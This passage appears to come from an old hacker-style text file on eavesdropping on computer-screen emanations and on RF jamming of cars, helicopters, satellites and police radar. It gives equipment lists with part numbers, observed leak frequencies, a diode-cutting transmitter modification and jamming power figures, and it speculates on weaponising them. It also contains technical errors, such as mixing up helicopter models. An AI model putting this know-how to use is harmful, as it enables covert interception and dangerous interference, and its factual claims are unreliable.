spent doing such things.
The end of this particular story is as follows: At the end of the suspect
journey, the truck was searched at the Nosgales, AZ border checkpoint and
was then released. Nothing considered illegal was found in the search
and the truck and it's passengers were released and entered Mexico.
Now even though the truck was suspected of performing passive
"eavesdropping" operations, the federal goverment had no legal right to
hold either the truck or crew. And the possible intercepted information was
then released from the country. It should be noted that the truck could
have a number of standard "off the shelf" items. These items could
have consisted of 2 general coverage radios with a combined tuning range
between 100 Khz to 2 Ghz., an IBM personal computer clone, various
cheap video and signal enhancment equipment, printers and modems,
and other such complement devices.
None of the equipment would be any "James Bond" type of gear and the
basic suspected set-up would cost the operation less than 10,000 dollars
if budgeted correctly. And if possible, use of other simple off the shelf
type radios like the 200.00unit available from Radio Shack that covers
150 Khz to 30 Mhz is not at all unheard of due to some budget constraints.
And since most emmanated signals generated by logical devices are within
commerical AM and FM frequencies, the use of a standard auto radio antenna
would suffice to use as a pickup.
So the major concern with such actions comes from the ability of simple
equipment to detect, register and decipher such emmanations with relative
ease. The ability of such persons and possible actions able to penitrate
the electronic fog of our society should be a clear distinct warning to
those concerned with security in general.
In addition to all of the above, the author contacted various federal
goverment agencies in reference to this information and was told that
they had no knowledge of such an investigation and could not tell where
such supposed counter-intelligence operations were controlled from or who
to contact in reference to supplying such information. Current "Freedom
of Information Act" requests for information concerning this supposed
federal project are underway.
An interesting note about filing the forms for access to information
about the Czech incident is described to give guidance to others who
may wish to investigate this incident and seek help from such elected
officals.
When the papers were filed for the desemenation of information
through the Freedom of Information Act, members of the U.S. Senate and
Congress were contacted in reference to this matter. The first contact
was placed through Senator Arlen Spectors office in Philadelphia, Pa.
We were first rebuffed by persons who refused to identify themselves
with the statement " I am sorry, but that information is covered by
the 1974 Privacy Act, Click! Well we called back and informed the
person who answered the call of the situation and then were re-connected
and informed them that Czech citizens were not covered by US privacy
laws and that there was no invasion of privacy.
They called the FBI and asked if they were the way such things were
handled, and were told yes or no. But they had no answer for any question
put forward and said " They were sorry!", but we don't know how to help
you!. Our second contact to Senator Spectors office in Philadelphia as
in essance like the first, they would not assist nor would explain why
they took this position in the first pace. During our second contact
we spoke to a Miss or Mrs. Anderson. She stated that such requests
were not in the senator's perview and they could not assist in this
matter. When asked why it as not in the senators preview, we were
informed that they do not have to give a response. When asked for an
offical response, we were informed that no offical response would be
given. But as a side note, Senator Hienz office said that they would
forward the requests to Spectors office in Washington. One other
thought on this matter: I am sure that if the good senator wants to get
some information, his staff jumps through hoops to get him all he wants
and then some! A pre-publish copy of this article will be delivered so
that even he (or his office staff, who were of no help at all due to a
tough question placed to them by a citizen) may learn of what may be
going on in his own country. So much for gaining assitance from a senator
who sits on a judical panel. We visited next the office of John Hienz.
Again, funny looks about the Freedom of Information Act and they hemmed
and hawed at the questions presented. They took the requests and said they
would try and see what could be done. Our final visit was to our local
congressman, Tom Foglietta, whos office still stated the 1974 Privacy law,
but took the requests when presented in person. It pays to visit your
elected representives working areas. So much to do (if you work there!)
in a goverment office. Other federal agencies including the FBI were most
helpful in complying with the requests. Of course we found this most
interesting. Is it so they could possibly reclassify the information to
a "Secret" status instead of what it may be now.
Other agencies contacted in reference to FOIA requests include the CIA,
NSA, NRO, Customs, State Dept., Army Automated Intelligence and Military
Police, FBI, FCC .
Example 2
"Breaker, Breaker, Wally Gator!"
-----------------------------
During the 70's, the United States had a short term love affair with
the Citizens Band radio. What were once clean channels were suddenly
crammed with persons who wanted to be able to communicate with any
number of persons who also had such capabilities. Suddenly, everyone
had one of these radios in the home or car and some were know to have
both. Numerous persons ran such rigs with varing illegal applications
ranging from a lack of license to the intense over powering of such
stations.
To give a brief explanation of CB's, we will keep it simple. CB's
transmit in the upper reaches of 26 Mhz to 27 Mhz or 11 meters band.
CB's are allowed to operate with a maximum output of 5 watts radiated
power. Of course this limited power was not sufficent for some users and
the use of linear amplifiers or "heat" was commonplace. Stations were
known to be transmitting 50 to 2 thousand watts to their antennas which
in turn would increase such signals to a power of over 2 hundred thousand
watts. Some operators were known to show the intense power outputs with
the use of flourescent lightbulbs and the abilty to "light" these tubes
from a distance without electrical connections with the amplified radiated
power of their antennas.
Some persons were known to have full control of channels in their
respective areas and would blank out anyone who would not conform to
the channels establised rules or procedures. Others set-up pirate
stations that would broadcast commerical music for all to hear
complete with news, weather and sports. Such actions would tie up
frequencies and caused a general crackdown by the FCC in the later
years. But the problem still continues and the FCC has all but given
up on the idea of any enforcement of regulations concerning such
operations on the 11 meter or 27 Mhz band.
The craze of CB's left the general populace by the late 70's and was
back in the hands of those who would truely use such radios. Those who
would use such radios best known, would be the persons called truckers
since that is what they do. They "truck" goods from one place to
another and are concerned with time and travel conditions as most of
us are. The truckers always had some "heat" on-board for those times
when they could not get their signal "out". It was and still is
considered an insurance policy by most who have this technology and is
widespread in its use.
Now over time, with the continued expansion of these radios, the
truckers began to switch to marine band radios in the 10 meter band
and were conversing just as before. Since the 10 meter band would
permit such radios and the increased power output, the switch to 10
meters was only a matter of time. Now, it is reported that most
truckers are using and abusing such frequencies and their is little
that can be done to stop such occurances from happening. To add to all
of the mess, such radios have the ability to switch operating frequencies
with the touch of a button. In brief, the 10 meter radios can switch to
the 11 meter (CB) band with minor modifcations. And back and forth
frequency hopping is as easy as tuning in the average auto radio.
One other interesting aspect of these 10 and 11 meter radios and their
use of 10 meter amplifiers, is the problem of interference generated
by the amplifiers due to the lack RF chokes and filters for the simple
reason that the unit is designed for use on the 10, meter band, not
the 11 meter band and thats what the chokes and filters look for, 10
meters, nothing more, nothing less!
Enter the common travelling person with a late model vehicle. Most
vehicles today have some form of directed artifical intelliengence
working under the hood. The "brain" controls any number of common
operations ranging from air / fuel mixtures to how and when braking
systems will perform. Microprocessors in todays cars are as common as
seatbelts and are now required to assist in normal operations of said
vehicles. And this is where the problem begins. Since the auto must
have such control circuitry to function, then the possible interference
of such operations becomes a real threat. But what sort of threat
could be possible with a car, its control systems and a high powered
transmitting radio? Well, if one was to examine the idea of overriding
or shuting down said operations, the car would cease to function in any
proper manner. Such a shutdown could very easily cause fatal accidents
and the cause would be un-known due to all "looking" fine in any
aftermath examination.
Now we add to the scene, your common average trucker with such a radio
in his poccession and the ability to transmit high powered signals as
one chosses. One example of such high power hijinks would be the
specfic targeting of autos on the highway with a points / scoring
system based on performance, price, make and if the car was built in
the U.S. or not. What would be the outcome? To answer, it would be the
shutdown of of the cars electronic logical systems causing other systems
on-board to do likewise in successive order. How can this come about?
Well the answer is quite clear, the high powered signal causes the logical
centers to conflict or ignore basic operational commands from the
microprocessor in turn causing the microprocessor to close down, then
cause a halt to basic actions and the car stops running.
Other known occuring incidents that have had some humerous and fatal
results have been reported in the past years by the press. Examples
are:
1. As early as the mid-seventies, Volkswagen developed a computer
controlled fuel injection valve control system. The car worked perfectly
in Europe, but had some unexplained engine failures in the united
states. The problem of engine failure was intermintent and very short
lived when happening. The alleged cause of such failures were the
transmission of Citizens Band radio frequencies from either mobile or
base stations near by and causing an induced current sufficent to
cause a malfuncition.
2. It was reported that some GM cars were having problems with the use
of two meter radios and the electronic control systems. Other cars are
reported to have some problems with cellular phones. Reports from
England even indicate such problems occuring in a wide spectrum of
autos in the area around Daventry due to RFI from the transmitter used
by Radio Four, a commerical station transmitting on 1500 meters along
with local AM and FM broadcasts. It seems that the station base was using
a very high wattage transmitter and that when the transmitter was
transmitting, the cars that passed close to the station would sometimes
shutdown the engine causing minor overall problems and some angry
motorists. If you look at this problem, you may see possible small
scale urban electronic warfare possibilities. Two such areas might
include the use of directed radio energy against late model autos by
law enforcement or worse, by terroristic factions seeking to do the
same thing. And one more example of such reports concern the sudden
acceleration problems with some imported cars in the U.S. An interesting
point to mention is that HONDA is offering owners of the 1988 Civic a
replacement chip because of such reported problems.
3. On the lighter side of the problem, it was reported in the November
24th, 1987 edition of the Baltimore Sun, that some residents of
Frederick, MD were having problems with the use of their electronic
garage door openers. Owners of such devices returned them to places
of purchase and found that the units worked perfectly. It was noted
that nearby, the U.S. Army operates a major communications center for
both domestic and international traffic. An Army spokesman stated that
they are not radiating anything that should lock up the garage door
recievers. It is also reported that when the Army turned off certain
transmitters, the garage door openers would work again. While the Army
stated that they were not the problem, the "problem" did disappear as
stated by the Army. You be the judge on this!
On the fatal side of this problem, incidents were more deadly than funny.
Although the cause of such incidents was all not due to an "Alligator"
radio, but it was caused by the same type of over poowered raidiated radio
emmissions. The cause was high wattage again and was to effect a new type
of attack helicopter in use by 2 different U.S. armed services.
The helicopter, known as the AH-64, Blackhawk or the naval version named
Seahawk is considered, operational state of the art in low level air
combat situations and is highly electronic in its basic make-up and
operations. The problem was two fold in nature and both were to contribute
in the final discovery.
The first cause was due to the need of the design to employ a unique
horizontal stabilizer to help the helicopter improve it fly-ability.
The stabilizer was controlled through a series of electronically
activated hydraulic systems run through a microprocessor that in turn was
controlled from the cockpit through a series of other logical and
electronic relay systems. There was no physical connection between the
crafts flight controls and the pilot of the craft. What is meant, is that
the fly by wire method was replaced by a set of relays and hydralic
attenuators instead of cables and pulleys. It may not a been as smooth as
the electronic flight, but it took an explosive charge to bring the
control to a dead stick and at the same time could be fixed with a pair
of wire cutters and clamps instead of a soldering iron and electronic
parts.
The second problem, being more unknown and deadly, consisted of radio
frequency interferance stemming from a number of different sources.
One such source was found as a common citizens band radio with major
illegal power output. Another incident of the same type of nature was
discovered when one of the helicopters flew to close to a commerical
radio stations transmissions towers. Both times the flight ended in
fatalities for the crews. It was discovered that strong radio was the
cause. According to published reports, 5 UH-60 Blackhawks have
nosedived into the ground killing 22 serviceman since 1982. And the
U.S. Army instructed it's pilots that flights near microwave antennas
or shipboard radar may cause "uncommanded" altitude changes. In English,
it translates to crashing into the ground at 600 miles per hour!
So, this basic simple problem was not thought of as one that was possible
even with the current concerns of systems management in the now fully
electronicisied battlefield.
So, the first problem was that the controls of the craft are being
directed by impulses instead of physical controls. The second was the
use of un-protected electronics from both background and now, potential
directed uses of radio frequency energy as weapons of warfare or even
better, as stated before limited urban actions.
So now we take the approach of normal radio environment and place an
active thought to possible options no available to a direct force.
If reports of these natures are known to the general public, then what
is to stop the directed force from becomming a new invisible tactic
that can cause major disruptions of computer / communications systems
currently in use.
Lets take the current state of electronic protective measure in force
and used by the different defense agencies throughout the country.
First off, we have the problem of large Electro-Magnetic Pulses, (EMP's)
being able to disrupt command and communications links with the use of
one nuclear device detoneated at a unknown range above the continential
united states.
Another example comes from outside theoretical research concerning the
SDI programs. One thought, from Thedore B. Taylor, a retired nuclear
weapons designer and father of the largest yield fission bomb, the
S.O.B., was quoted in an interview published in September, 1987.
He stated that if you explode a one-kiloton device in space and directed
the energy into a 3 centimeter beam of radiation, you could deposit
enough energy to wipe out electronic and electrical equipment - computers,
antennas, power lines, over an area larger that Washington, D.C. He was
also quoted as saying that microwave weapons are more than likely being
developed too.
Now weapons of this nature are on a very large scale and require vast
amounts of energy too start with. But in a directed small beam aimed at
normal general construction type buildings, a directed beam of energy cuts
through walls, doors, and windows as if they were not even there.
Your example is some of the local television or radio stations in your
area. If you look at all or most of the stations, you might find a small
shack atop of their building. It may contain the microwave dishes for the
studio to transmitter links. The glass and wood are nothing to the
in-comming or out-going signals. Brick walls mean nothing to a radio
signal either. Just tune in your desk radio and listen to your
favorite station.
So this pulse would be able to short out almost all commerical electrical,
telecommunications, computer operations, and any other devices that
contain transistors or semiconductors for a circuit path. These basic
examples show what such types damage that these emmisionns may pose.
The second part of this problem is with the protection of such circutry.
Great amounts of technology protection comes in the form of deep trenches,
standard and special grounding of buildings and equipment, cable and
support runways, and concrete encasements. Now this is all wonderful and
good from a military viewpoint where money is no object, but in the real
world, the use of such protective measures is not possible even for the
most prestigieous of corporations.
Now if such large pulses can destroy equipment on a global scale. Then the
idea of using such forces becomes a better local tool for the destruction
of security and measures taken to protect such devices and facilities from
a physical standpoint.
Ok now we know that the possibility of directed energy may be used to
disrupt the communications and operations of logical devices. There
are numerous ways to use such technology to gather and alter electronic
impulses. Another group of examples comes closer to the common man and
is happening all to frequently to the owner / operators of mass
communications systems. Best know, is the interruption of signals from
a Home Box Office satellite and the insertion of a message that stated
its subscripton rate was to high. That one incident struck fear in the
hearts of the communications industry and showed that anything was
fair game.
Other actions placed against commerical stations include the interception
and signal override of 2 television stations in the Chicago area. One such
action was placed against a Public Broadcasting station and the other was
directed to one of the "Super Stations" in the same area. The first pirate
transmission lasted 15 seconds and the second, two hours later, lasted 90
seconds. The Pirate, dressed in a Max Headroom facemask, uttered some
statement, although garbled and during the second incident, bent over and
exposed his / her rear and was struck on the behind with a fly swatter to
the shock of the viewers. Of course the FBI and FCC were called in to
investigate, but investigations of this sort led to nothing more than an
empty trail.
Now to perform such deeds, one would have to contact either the station or
the local office of the FCC to find out what the transmit and studio to
transmitter frequencies are. (And this goes for any transmitter registered
with the FCC. They will supply the name and location, frequency, and the
maximum legal output of such sites.) There are two frequencies used for
each television channel. One for the Audio and the other for the Video, or
the other option, to listen or watch the station until it sign's off for
the day (night). This one method does not lead to possible discovery and
the frequencies are given at sign-on and sign-off. A good example of such
frequencies is with a station located in Philadelphia, Pa. The station,
WPVI, transmits its audio signal on commerical FM frequencies.
The frequency is 87.8 Mhz. Now anyone with a good transmitter could add
anything to the signal and no one would be the wiser until they did.
Examples of such transmitters and persons capable of doing this type of
transmission is best described by the incident in the summer of 1987
concerning Radio New York. This radio station was considered a "pirate"
station and the federal goverment decided to move in and shut them down.
An interesting note to all of this, was that the station was located on a
ship anchored off the coast of New York outside US boundarys. Still the US
goverment with agents of the FBI, FCC, Customs and the Coast Guard boarded
the vessel, closed down the station, arrested the persons on-board and the
ship was taken in tow. End of that particular story.
On the other hand, two other stories of interest deal with the possible
and real way some may be able to jam or possibly damage state of the art
satellite communications. The first dealt with a group who call themselves
the American Technocratic Association based in Wilmington, Delaware.
This groups thought revolve around the scrambeling issue in use by the
pay TV companies. The background of the members of this group claim to
have a good working knowwledge of military radar communications systems.
The group claims to have the capability to jam a satellite with a few
mobile systems it has. One operation that the group hopes to undertake
was called "Operation Sunspot". The group claims to have areas mapped
out that have no treaty, regulation or statute dealing with the jamming
of a geo-stationary satellite. The one problem with all of this is that
such a thing could happen very easily. Now there are some who say that
such things could not happen, but if one is to look in a number of
magazines for such information on frequencies or locations, you could
find it.
So you say to yourself that you want to try this experiment. Well we
will not supply exact details of such techniques, but will say that
HAM radio operators have the ability to contact both American and
Soviet repeater satellites and if you wanted to you could do the same
thing. Now for your basic uplink to such systems, you would need a
transmit dish and the power behind the signal. So for a ten foot dish,
you would need 91 watts, a six foot dish, 280 watts. It may not be
dirt cheap to generate high powered signals in the mid range of 1-10
Ghz, but it does not present a great techincal obstacle and surplus
gear is so easy to obtain.
You don't need large dishes with great amounts of power to do this.
All that is needed is a moderate size dish, a few tens of watts at
microwave frequencies, and Bingo! You've got an effective satellite
jamming station! And then you have to address the issue of the
telemetry channel. THey may not be able to overtake the signal, but if
jam the signal with another, it may be possible to affect the
operation, stability or orbit of the target. Frequencies for such
channels are available from a number of sources and for as little as
$2.50 per frequency.
Now these examples and the reported stories dealing with television
stations interuption's are fast becomming one of the most feared aspect
of open air transmissions. Such transmitter frequencies are no longer the
domain of commerical radio and television stations. Transmissions on any
frequency are just a phone call away from suppliers who provide common
or business radio transmission technology.
So if satellite and television stations can be interupted by such
forces, six million dollar helicopters are taken down because of CB
radios, and automobiles cease to operate due to a wide spectrum of
emmited signals, then the possibility to intercept and harvest vast
amounts of knowledge is available to those who wish to gather such.
Now to explain such basic interceptions are now commonplace with
horrific results to those who do not believe that such things can
happen. For a simplistic view of such emmited signals, take a standard
"Walkman" type of radio and visit one of the many locations of ATM's
or better known as "money machines". (This excerise may also be performed
near any standard personal computer if such machines are not available.)
and tune through the FM band. With careful tuning, one will be able to
"hear" machine funcitions occuring. Taking basic simple electronics, one
may have the ability to recieve and reconstruct such impulses to a
readable form.
Or an example of larger scale and better know, would be with the use of
back-yard home satellite dishes. Dishes range from 6 to 12 feet wide.
Signals available include music, sports, news, movies, stock and
commodity trading quotes, weather, education and other such information
services. In addition to these services, a number of different multi-site
conference services are available from a host of major hotel chains as
well as privatly organized meetings held for specfic time periods and
dates. All may be tuned through the use of a dish and sensitive
information that may not be available to someone, is then made available
and no one is the wiser! Transponders are not private, and are rented out
for only the time used. And one other thing that might bring you to your
senses about such signals, is that the signals are transmitted by the
satellite over a wide area to anyone who can recieve such signals.
One other development is the small Micro-Sat by Norsat. This complete
system offers both satellite bands coverage, Ku and C, a small dish and
circuit board that fits inside an IBM PC. The unit downblocks 950 Mhz to
1.45 Ghz, offers a maximum baud rate of 9600 bps, frequency, bandwidth,
video and audio selectable formats and may be connected to the
VideoCipher II, B-Mac and Oak Orion descrambling systems.
Some other such signal reconstruction devices are now also available
through the mails. One such device is available in plan form from
Don Britton Enterprises and is called the Re-Process Sync Amplifier.
The device was developed to recieve signals emmanated from cable
television systems. What the device does in essance, is to take a
signal that "leaks" from cable tv systems and recieves such, adds a
sync signal needed by the television set to display the recieved
signals and then sends the signal to the antenna input of the set so
that display may happen. Now if weak signal reception is available from
leaking cable systems, then the ability to recieve weak signals from
logical devices is also possible.
Interception and Weapons Possibilities
--------------------------------------
Think about possible interception points pertaining to logical
security methods. Communications may be encrypted, data may be stored
in an in-active form and access is only a matter of time while the
interceptee is waiting for the dispersal. The next security concerned
area covered would be for the encryption of the information in its
stored and transmitted form. The encryption is all wonderful and good
for the transmission and storage, but does nothing for the information
as it is in its final stage to the human eyes! And you only have two
ways to get it to the eyes, in hard copy or by a video screen.
Now you think that interception is not possible since the information is
encrypted, but the data must be decrypted so that the human connection
may use the information. The human connection allows for the reception
of said information by the afore mentioned devices and lets interception
to happen through the clear or decryption points of the attacked devices.
And one other point to mention; other possible effects of reception /
transmission to security in general, could affect other controls ranging
from building energy management to security access and monitoring
controls.
To give a better understanding of such equipment, we will discuss
some of the devices known. One such device known as the Van Eck device
and the other is called the Re-Process Sync Amplifier. Some may feel that
there are two different systems involved in this discussion, but the
author finds no major difference between the two, with the exception of
the Van Eck device is built for operation on European voltages and has a
built-in digital frequency meter. The one major difference found is with
the dates of copyrights for the two devices. The Don Britton device is
dated 1979, while the Van Eck unit is dated October,1985.
Note: Another unit, with plans for such devices, are available from
Consumertronics, located in Alamorgordo, New Mexico. Besides the plans
for a Van Eck type reader, one book offers information in reference
to computer crime and countermeasures, how systems are penetrated, BBS
advice, Password defeats, TEMPEST, crosstalk amplifiers and a 200 word
phreaking terms glossary. All for only $15.00
We will begin with a basic understanding of the inner workings of the
device. The one other major basic difference with the two reader boxes is
that the Van Eck box is designed for use with tv's and VDT's used in
Europe as compared with the Britton box built for use in the United
States. This device in general, is designed to restore and regenerate the
sync and colorburst signals and ignores all information appearing during
either the vertical or horizontal blanking. Its basic result is
reconfigure through the use of supplying artifical external signals
inputed directly to any video monitor through a simple 10-50 dollar
modification of the TV or video monitor, or in simple english, takes a
weak video signal and tries to shape or match it and then boost its
output to a normal television screen.
One other interesting thought comes to mind with the use of video tape
copy protection methods. Since these methods use a means that makes it
tough on the VCR not the TV from generating signals for tape duplication,
there have been a number of devices that assist in the retoring and
re-structure of the picture and sound. One device is known as the
"Line Zapper". The device helps to adjust the brightness changes, vertical
jumping and jittering, and video noise. It is available in kit or complete
form. Pricing starts at $69.95 and complete tested units cost $124.95.
Now if this unit can assist in the filtering and structuring of
commerically induced weak signals, then it should be able to take a
boosted signal presented to it and clean the picture to something of
useable form. Some may see this only as a filter for video processing
with a focal point on the actual copy-guard techniques, but such a
device incorporated into the Van Eck type of gear should assist in the
overall signal restructuring.
Now one other interesting point about possible video signaling
re-construction methods was addressed in a multi-part series published in
Radio-Electronics based on the methodology used for the construction of
video signals scrambeled by different vendors of cable and over-the
air pay television. The series dealt with all aspects and methods of
video and audio, (complete with discussions on the DES methods used for
the VideoCipher units and the like,) used in commerical systems in use.
One other thought comes to mind of an experimental nature. Since the
screen of a computer is not always changing and for the most part stable
in its display, why not take the recieved signal and digitize it!
You could filter out signal noise clean up any true video signal present.
This is no great techno-wonder, the basic gear could be put together with
Radio Shack or the like types of equipment. And the cost is still most
reasonable. If not available there, costs for hole-bret gear would not be
that high. The simple electronics blocks would consist of comparators,
video detectors, data seperator gates, a to d - d to a converters,
data amp and a signal level converter.
Or the better version, might be a modified slow scan television system
with error correction and clean-up circuits. Such units work over normal
phone lines or standard radio channels and since the units can take
signals from these two different types of inputs, there should be no
problem in adapting the unit to accept a cleaned up analog signal from a
digitizer.
Away from the world of the experimental thoughts, we return to the
point at hand....
Now there are two types of monitors used today. The first, called
composite and the second using TTL logic to control the screen and its
pattern. The composite screen is nothing more than a television set or
Apple computer type of monitor. The construction of the picture is
performed by a beam of electrons that are scanned across the screen at a
rate of 525 lines per second. Since the majority of screens are of a
composite nature ( this is even true in most IBM environments) the
ability to recieve the signal is very possible from a radio emmission
standpoint.
The reception of such signals is not fairytales, but comes with reality
attached through the use of simple electronics. The first part of the
reception project is to have a method of signal acaquisition and
amplifcation. Such gathering may be performed by the use of standard
electronics store technology. For this example, we will use common
Radio Shack electronics. The reason is due too the common variety
electronics that are available to most persons needing such science to
accomplish the required gathering.
To start, since a base station is out of the question due to the weak
signals one would have to recieve. So the need for transportable equipment
is a must. Antenna, amplifier, sync process unit and display medium
must be powered in the transit unit. uepending on budget and (BEL)
(Basic Equipment List) requierments a fully battery operated set-up
can be constructured for under ................
Our two systems described here will be different only in basic
construction and budgetary BEL's.
The "Radio Shack" Reader
------------------------
1. The antenna could consist of a Radio Shack TV/FM # 15-1611 for 49.95
2. If needed, Radio Shack in-line signal amplifier 10 db gain # 15-1117
for 15.95
3. Radio Shack RF Video Modulator # 15-1273 for 26.95
4. The Britton or Van Eck unit (Cost unknown due to construction needs)
5. The tuning unit may consist different available FM,TV,UHF tuners
available for the tuning of TV Sound & Picture reception and
possible recording. Costs for such units range from 319.95 to 119.95
The 319.95 unit can operate on AC / DC, has audio / video input jacks
and can operate on 9 "D" batteries. Other possible useable units would
be # either # 16-109 or 16-111. The units cost 219.95 and the other
159.95 Both are able to tune in the full commerical AM / FM and
VHF/UHF Television signals, The low end of the cost spectrum would
be the RS # 16-113 at 119.95 This unit also has the same spectrum
tuning abilities.
The Gold Plated Unit
--------------------
1. The antenna could consist of a Radio Shack TV/FM # 15-1611 for 49.95
(Or due to the use of better reception electronics having built in
antennas. But due to the need for amplified signals being inputed
to the reciever we will still possibly use the RS amplified antennas.)
a. It is also possible to use any number of amature radio antennas.
For the purpose of maintaining a low profile, we will use one of the
standard active recieving antennas that has a spectrum of reception
from 50Mhz to 1 Ghz. Such units are available from mail order supply
houses.
2. If still needed, Radio Shack in-line signal amplifier 10 db gain
# 15-1117 for 15.95 It is also possible to use # 15-1105 Indoor FM
Signal Booster with switchable 0,10 or 20 Db gain at a cost of 24.95.
3. Radio Shack RF Video Modulator # 15-1273 for 26.95
4. The Britton or Van Eck unit (Cost unknown due to construction needs)
5. Tuning units- The tuning units would consist of 2 seperate radio
units. The units, both ICOM's have a combined tuning range of 100 Khz
to 2 Ghz.
a. Unit 1 (R-71a) tunes from 100 Khz to 30 Mhz. This unit is nothing more
than a shortwave reciever with excellent signal reception and frequency
stability that offers far better overall signal interception quality.
The unit offers 1 Hz tuning and has digital frequency readout.
As an option, this unit may be controlled by an IBM or compatable PC.
Cost for this unit is $949.00
b. Unit 2 (R7000) covers 30 Mhz to 2 Ghz. This unit is a general coverage
reciever with excellent signal reception and frequency stability that
offers far better overall signal tuning and interception quality.
Also this unit can be computer controlled through an IBM or
compatiable. The unit offers .01 Hz tuning and has digital frequency
readout. Additional abilities of the unit include signal output and a
IF output of 10.7 Mhz with other frequencies available. The cost for
the unit is $1099.99. This particular unit also has an option for the
output of the video signal and connection of any standard video monitor
for 130 dollars. For an additional 160 dollars the unit can have the
ability to recieve signals from 20 Khz and go all the way to the
specified 2 Ghz. The unit needed is called a Kuranishi FC-7000
frequency converter. With additional commerical television MDS tuning
equipment, ranges can exceed 2.7 Ghz. Costs for this will range
between 79 and 109 dollars. Since we will be mostly dealing in the
lower ranges of frequencies, an added piece of gear may be used to gain
the best signal reception points available. This is through the use a
Radio Direction Finder available from American Electronics for 100
dollars.
Now with all this equipment for both systems, another basic system
with minumum cost is readilly available to many for under 100.00
dollars. This we speak,of is the common Black & White Television set
available in mass quanties from any number of sources. It has been
reported that such interception capabilities are possible and have
occured without the interceptee knowing until the Communications
Commission have contacted the source of the emmited signals.
For example, some personal computers and their respective screen have
been known to been picked up on the TV screens of their neighbors and
through nothing more than rough or fine tuning the reception. The reason
is due to the TV having the ability to automatically adjust the Sync
signals to those close to the frequency of intercepted computer screens
sync frequency. This "ability" is available through the use of a common
manual type tuner on a standard Black & White set with a normal
directional antenna and an standard antenna amplifier. All three
devices in common life and attached to your own television recievers!
You have such devices if you have an antenna on your roof or attached
to your set. Most have attached signal amplification due to the ever
growing background noise generated by normal commerical stations and
reception charictersistic In simple term, the guy next door can read
your screen and you don't know it. Now take the number of personal type
computers in a standard corporate environment, caulculate the possible
dollar figures of the combined information contained in these machines,
and substantial sums become more evident than ever before. If business
plans, formulas or patent-trade information, client lists, or any
other type of valuable information and since that information will be
called up at any time or current work performed is wanted in the
surveillance gathering operation and then you have a completely wide open
way of monitoring the daily practices and transactional actions with
complete impunity and securty of such areas is completely unguarded due
to the lack of knowledge.
For experimental purposes, we will use very simplistic computer systems
to give an idea of what may be possible. The equipment shall be basic,
over the counter, cheap, electronic systems to gather and produce the
signals we which to collect.
The equipment list is as follows:
1. Franklin Ace 1200 (Apple II compatiable)
a. Franklin Ace Serial / Paralell Card
(Paralell card is in use for the 2 printers.)
b. Apple Super Serial Card (RS-232) for use with the communications
modem.
2. Franklin Video Monitor (40 or 80 characters display) 18 Mhz
( Standard IBM monitors radiate at 15 to 16 Mhz )
3. Prometheus ProModem 1200 (External type)
4. Printers
a. Okidata Microline 92
b. Epson MX-80
Our basic reception / interception equipment consists of:
1. Bearcat 250 (50 Channel) Scanner
(Coverage from 32-50,146-148,148-174,420-450,450-470,470-512 Mhz)
2. Soundesign FM Stereo Tuner (86.5 Mhz to 109.5 Mhz)
3. Electrobrand AM-FM-SW-CB-TV-PB-AIR-Weather
The AM and FM are standard commerical band recievers.
SW is short-wave from 4 Mhz to 12 Mhz
TV coverage is from audio channels 2 through 13
AIR band from 108 through 135 Mhz
Public Band is 145 through 175 Mhz
4. A Gould OS 1100 A Osocilliscope 25 Mhz range
Since we will not try to re-construct the actual video signal generated,
as this has already been done, we will not have to explain what we recieve
as a picture. What we will cover is the gross signal output of standard
population computerized logical systems.
In our observations, we have seen a wide spectrum of emmitted signals
with a strong signal between 9.0 and 9.250 Mhz for the display of
standard text scrolling by. Better signal display was found at the
lower frequencies of 9 Mhz. Monitor frequencies were found in the area
of 11 through 19.5 - 20 Mhz. Printer frequencies are in the range of
140 to 200 Mhz. Disk operations were detected in the ranges of 88 to
250 Mhz. Overall frequency generation was from 4 through 500 Mhz.
The modem was found between 28 and 300 Mhz. All in all, this easy
discovery of radiated or transmitted signals by means of common radio
technology could lead to.
An interesting thought comes up with the use of some common ham
transcievers for such operations, and with simple, easy modifications,
some can transmit on all frequencies from 1.6 t 30 Mhz. Such a transmitter
would be the Kenwood 440. This transciever offers 100 watt output and as
stated all frequency transmit. To perform the small modification, all one
would have to do is cut one lead to a diode (Diode D 80) and as an added
bonus for better frequency readout, you gain an additional readout of
10 Hz by snipping the lead to Diode 66. So the unit covers the range of
IBM PC frequencys in use and all of the Apple systems too. Thats says it
all! It can offer the possibility for disruption of internal signals used
to process information and the possibility of causing other logic related
systems to act or not without reason.
For example, would it be possible for the Soviets to sit under cover with
a modified Kenwood 440 100 watt radio or better yet, a Radio Shack 40
channel AM / SSB and a 100 watt Firebird linear amplifier and a simple
small antenna to disperse the signal. So the problem of the 6 million
dollar helicopter comes down to a wholesale cost of 150.00 ( 190.00 to
200.00 for an average rip-stop nylon camping backpack unit ) per man with
a recommended dispersal of 3 manpacks per unit into the theater.
Suspected effective ranging up to 3 miles per man pack unit is suggested.
Or even better, if such things were possible against military aircraft
or normal commerical real world autos, then directed intent should be
of now problem against civilian targets such as computer installations,
bank and operations support structures, possible override of security
systems and any other systems that may be affected by such forces.
Other uses of directed energy may be used in law enforcement situations
for the apperhension of suspected persons in late model automobiles.
If the truckers are using the radios for game playing, then why can't the
police have the same type of device for the stopping of autos? There are a
number of devices that will radiate such energies over the spectrum.
One such device would be the Radar Speed Gun Calibrator (or better know as
a radar jammer) for use with calibration of speed guns or for the
deceiving of police radar units. The plans for such units were (are)
available for a number of sources. One such source, is Philips Instrument
Company or another such source was the Radio-Electronics issue in the
spring or summer of 1987 with plans for the Radar Speed Gun Calibrator,
that would allow you to transmit a signal that would equal the same type
of reflected signal from an automobile traveling at the supposed testing
speed. Range's of speed signal output would equal 5 mph to well over
100 mph.
Some plans or kits come with instructions for the combination of radar
jammer units with most commonly available auto radar detector units.
In simple terms, the radar detector unit detects a signal and through
its display or attention getting circuitry in turn activates the radar
jamming equipment to deceive or jam the police transmitter / reciever
units. Best know of such combinations, were the use of Escort radar
detectors and jammer units with transmission horns mounted behind the
front grill of autos. No ifs, ands, or buts, they work!
One other piece of equipment that may have devastating effects on overall
security and support systems, deals with the generation of very high
energy pulses that might be classified as being able to generate EMP's
that could damage almost any piece of electronic gear. The claim from the
designer is that this device can generate a pulse with an effective range
of multi-millions of watts. The device on average will produce a pulse
equal to 400,00 wats in a testing mode with the multi-million outputs
available with full charging of the capacitor banks peaked. Also stated in
this book is the ability of the unit to produce a very large inductance in
near by electronic gear. Most interesting! And the only statement in this
book about the device and it's short comming, has to deal with the
in-ability of the device to produce sufficent output used in certain
nuclear experiments. I wonder what that means?
So, in closing, the capability of these units is well within the range of
